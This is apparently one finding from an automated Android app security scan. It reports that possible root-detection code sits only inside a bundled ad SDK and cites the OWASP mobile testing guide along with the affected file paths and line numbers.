This application may have root detection capabilities. As with the pinning finding, the hits are all inside the ad SDK (com/wandoujia/ads/sdk/), so the detection most likely serves the SDK's own purposes rather than protecting the game; treat it as a heuristic match until the code is read. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md#testing-root-detection-mstg-resilience-1 Files: com/wandoujia/ads/sdk/f.java, line(s) 138 com/wandoujia/ads/sdk/legacy/util/f.java, line(s) 304,285,289